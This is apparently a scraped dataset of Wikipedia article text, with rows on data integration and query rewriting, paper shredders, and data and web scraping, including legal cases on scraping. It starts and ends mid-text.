or LAV. GAV systems model the global database as a set of views over S displaystyle S . In this case M displaystyle M associates to each element of G displaystyle G a query over S displaystyle S . Query processing becomes a straightforward operation due to the well-defined associations between G displaystyle G and S displaystyle S . The burden of complexity falls on implementing mediator code instructing the data integration system exactly how to retrieve elements from the source databases. If any new sources join the system, considerable effort may be necessary to update the mediator, thus the GAV approach appears preferable when the sources seem unlikely to change. In a GAV approach to the example data integration system above, the system designer would first develop mediators for each of the city information sources and then design the global schema around these mediators. For example, consider if one of the sources served a weather website. The designer would likely then add a corresponding element for weather to the global schema. Then the bulk of effort concentrates on writing the proper mediator code that will transform predicates on weather into a query over the weather website. This effort can become complex if some other source also relates to weather, because the designer may need to write code to properly combine the results from the two sources. On the other hand, in LAV, the source database is modeled as a set of views over G displaystyle G . In this case M displaystyle M associates to each element of S displaystyle S a query over G displaystyle G . Here the exact associations between G displaystyle G and S displaystyle S are no longer well-defined. As is illustrated in the next section, the burden of determining how to retrieve elements from the sources is placed on the query processor. The benefit of an LAV modeling is that new sources can be added with far less work than in a GAV system, thus the LAV approach should be favored in cases where the mediated schema is less stable or likely to change. 1 In an LAV approach to the example data integration system above, the system designer designs the global schema first and then simply inputs the schemas of the respective city information sources. Consider again if one of the sources serves a weather website. The designer would add corresponding elements for weather to the global schema only if none existed already. Then programmers write an adapter or wrapper for the website and add a schema description of the website's results to the source schemas. The complexity of adding the new source moves from the designer to the query processor. The theory of query processing in data integration systems is commonly expressed using conjunctive queries and Datalog, a purely declarative logic programming language. 20 One can loosely think of a conjunctive query as a logical function applied to the relations of a database such as f ( A , B ) displaystyle f(A,B) where A B displaystyle A B . If a tuple or set of tuples is substituted into the rule and satisfies it (makes it true), then we consider that tuple as part of the set of answers in the query. While formal languages like Datalog express these queries concisely and without ambiguity, common SQL queries count as conjunctive queries as well. In terms of data integration, "query containment" represents an important property of conjunctive queries. A query A displaystyle A contains another query B displaystyle B (denoted A B displaystyle A supset B ) if the results of applying B displaystyle B are a subset of the results of applying A displaystyle A for any database. The two queries are said to be equivalent if the resulting sets are equal for any database. This is important because in both GAV and LAV systems, a user poses conjunctive queries over a virtual schema represented by a set of views, or "materialized" conjunctive queries. Integration seeks to rewrite the queries represented by the views to make their results equivalent or maximally contained by our user's query. This corresponds to the problem of answering queries using views (AQUV). 21 In GAV systems, a system designer writes mediator code to define the query-rewriting. Each element in the user's query corresponds to a substitution rule just as each element in the global schema corresponds to a query over the source. Query processing simply expands the subgoals of the user's query according to the rule specified in the mediator and thus the resulting query is likely to be equivalent. While the designer does the majority of the work beforehand, some GAV systems such as Tsimmis involve simplifying the mediator description process. In LAV systems, queries undergo a more radical process of rewriting because no mediator exists to align the user's query with a simple expansion strategy. The integration system must execute a search over the space of possible queries in order to find the best rewrite. The resulting rewrite may not be an equivalent query but maximally contained, and the resulting tuples may be incomplete. As of 2011 update the GQR algorithm 22 is the leading query rewriting algorithm for LAV data integration systems. In general, the complexity of query rewriting is NP-complete. 21 If the space of rewrites is relatively small, this does not pose a problem — even for integration systems with hundreds of sources. Large-scale questions in science, such as real world evidence, global warming, invasive species spread, and resource depletion, are increasingly requiring the collection of disparate data sets for meta-analysis. This type of data integration is especially challenging for ecological and environmental data because metadata standards are not agreed upon and there are many different data types produced in these fields. National Science Foundation initiatives such as Datanet are intended to make data integration easier for scientists by providing cyberinfrastructure and setting standards. The five funded Datanet initiatives are DataONE, 23 led by William Michener at the University of New Mexico; The Data Conservancy, 24 led by Sayeed Choudhury of Johns Hopkins University; SEAD: Sustainable Environment through Actionable Data, 25 led by Margaret Hedstrom of the University of Michigan; the DataNet Federation Consortium, 26 led by Reagan Moore of the University of North Carolina; and Terra Populus, 27 led by Steven Ruggles of the University of Minnesota. The Research Data Alliance, 28 has more recently explored creating global data integration frameworks. The OpenPHACTS project, funded through the European Union Innovative Medicines Initiative, built a drug discovery platform by linking datasets from providers such as European Bioinformatics Institute, Royal Society of Chemistry, UniProt, WikiPathways and DrugBank. |
534 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Paper_shredder | A paper shredder is a mechanical device used to cut sheets of paper into either strips or fine particles. Government organizations, businesses, and private individuals use shredders to destroy private, confidential, or otherwise sensitive documents. The first paper shredder is credited to prolific inventor Abbot Augustus Low, whose patent was filed on February 2, 1909. 1 His invention was however never manufactured because the inventor died prematurely soon after filing the patent. 2 Adolf Ehinger's paper shredder, based on a hand-crank pasta maker, was the first to be manufactured in 1935 in Germany. Supposedly he created a shredding machine to shred his anti-Nazi leaflets to avoid the inquiries of the authorities. 3 Ehinger later marketed and began selling his patented shredders to government agencies and financial institutions converting from hand-crank to electric motor. 2 Ehinger's company, EBA Maschinenfabrik, manufactured the first cross-cut paper shredders in 1959 and continues to do so to this day as EBA Krug Priester GmbH Co. in Balingen. Right before the fall of the Berlin Wall, a “wet shredder” was invented in the former German Democratic Republic. To prevent paper shredders in the Ministry for State Security (Stasi) from glutting, this device mashed paper snippets with water. 2 With a shift from paper to digital document production, modern industrial shredders can process non-paper media, such as credit cards and CDs, and destroy thousands of documents in under one minute. 2 Until the mid 1980s, it was rare for paper shredders to be used by non-government entities. A high-profile example of their use was when the U.S. embassy in Iran used shredders to reduce paper pages to strips before the embassy was taken over in 1979, but some documents were reconstructed from the strips, as detailed below. After Colonel Oliver North told Congress that he used a Schleicher cross-cut model to shred Iran-Contra documents, sales for that company increased nearly 20 percent in 1987. 4 Paper shredders became more popular among U.S. citizens with privacy concerns after the 1988 Supreme Court decision in California v. Greenwood; in which the Supreme Court of the United States held that the Fourth Amendment does not prohibit the warrantless search and seizure of garbage left for collection outside of a home. Anti-burning laws also resulted in increased demand for paper shredding. More recently, concerns about identity theft have driven increased personal use, 5 with the US Federal Trade Commission recommending that individuals shred financial documents before disposal. 6 Information privacy laws such as FACTA, HIPAA, and the Gramm Leach Bliley Act are driving shredder usage, as businesses and individuals take steps to securely dispose of confidential information. Shredders range in size and price from small and inexpensive units designed for a certain amount of pages, to large expensive units used by commercial shredding services and can shred millions of documents per hour. While the very smallest shredders may be hand-cranked, most shredders are electrically powered. Shredders over time have added features to improve the shredder user's experience. Many now reject paper that is fed over capacity to avoid jams; others have safety features to reduce risks. 7 8 Some shredders designed for use in shared workspaces or department copy rooms have noise reduction. citation needed Larger organisation or shredding services sometimes use "mobile shredding trucks", typically constructed as a box truck with an industrial-size paper shredder mounted inside and space for storage of the shredded materials. Such a unit may also offer the shredding of CDs, DVDs, hard drives, credit cards, and uniforms, among other things. 9 A 'shredding kiosk' is an automated retail machine (or kiosk) that allows public access to a commercial or industrial-capacity paper shredder. This is an alternative solution to the use of a personal or business paper shredder, where the public can use a faster and more powerful shredder, paying for each shredding event rather than purchasing shredding equipment. citation needed Some companies outsource their shredding to 'shredding services'. These companies either shred on-site, with mobile shredder trucks or have off-site shredding facilities. Documents that need to be destroyed are often placed in locked bins that are emptied periodically. As well as size and capacity, shredders are classified according to the method they use; and the size and shape of the shreds they produce. There is a number of standards covering the security levels of paper shredders, including: The previous DIN 32757 standard has now been replaced with DIN 66399. This is complex, 10 but can be summarized as below: The United States National Security Agency and Central Security Service produce "NSA CSS Specification 02 01 for High Security Crosscut Paper Shredders". They provide a list of evaluated shredders. 11 The International Organization for Standardization and the International Electrotechnical Commission produce "ISO IEC 21964 Information technology — Destruction of data carriers". 12 13 14 The General Data Protection Regulation (GDPR), which came into force in May 2018, regulates the handling and processing of personal data. ISO IEC 21964 and DIN 66399 support data protection in business processes. citation needed Navigating the complex landscape of federal regulations for data protection and document destruction is crucial for businesses in maintaining compliance and avoiding penalties. Understanding these regulations ensures that sensitive information, whether in digital or physical form, is handled securely. Health Insurance Portability and Accountability Act (HIPAA) - 1996 Established by the federal government, HIPAA mandates businesses to implement safeguards for protecting health information. Non-compliance can result in substantial fines. This act emphasizes the importance of handling medical records with utmost confidentiality and security. More information about HIPAA can be found on the CDC's website. Computer Fraud and Abuse Act (CFAA) - 1984 The CFAA regulates how businesses manage sensitive data on digital platforms. It underscores that simply deleting files from a hard drive doesn't guarantee data security. To ensure complete data destruction, the physical destruction of hard drive platters is necessary. Detailed information on CFAA is available at the U.S. Department of Justice website. Gramm-Leach-Bliley Act (GLBA) - The GLBA sets forth guidelines for financial institutions on the disposal and management of financial records. This act ensures that financial documents are handled and destroyed in a manner that prevents unauthorized access and misuse. The Federal Trade Commission provides further details. Legal Document Protection Across 32 States and Puerto Rico - A majority of states and Puerto Rico have enacted laws to safeguard identifying information managed by law firms, businesses, and government entities. These laws dictate the storage duration, handling, and destruction methods for legal documents, requiring them to be rendered unreadable or undecipherable. New York’s specific regulation can be explored at N.Y. Gen. Bus. Law 399 H. Sarbanes-Oxley Act - 2002 This act governs the retention period for business records before destruction is permissible. It's vital for businesses to be aware of these retention times to ensure compliance. For further guidance, refer to the official bill text. Fair and Accurate Credit Transactions Act (FACTA) - An amendment to the Fair Credit Report Act, FACTA protects consumers from identity theft by providing guidelines on the proper disposal and protection of customer data, including account numbers and social security numbers. The FTC’s website offers comprehensive information on FACTA. Understanding and adhering to these federal regulations is vital for businesses to ensure the secure handling and destruction of sensitive data, thereby safeguarding against breaches and maintaining compliance. Information provided by Country Mile Document Destruction. There have been many instances where it is alleged that documents have been improperly or illegally destroyed by shredding, including: To achieve their purpose, it should not be possible to reassemble and read shredded documents. In practice the feasibility of this depends on The resources put into reconstruction should depend on the importance of the document, e.g. whether it is How easy reconstruction is will depend on: Even without a full reconstruction, in some cases useful information can be obtained by forensic analysis of the paper, ink, and cutting method. The individual shredder that was used to destroy a given document may sometimes be of forensic interest. Shredders display certain device-specific characteristics, "fingerprints", like the exact spacing of the blades, the degree and pattern of their wear. By closely examining the shredded material, the minute variations of size of the paper strips and the microscopic marks on their edges may be able to be linked to a specific machine. 25 (c.f. the forensic identification of typewriters.) The resulting shredded paper can be recycled in a number of ways, including: |
535 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-11 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
536 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Semantic_annotation_recognizing | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
537 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-17 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing 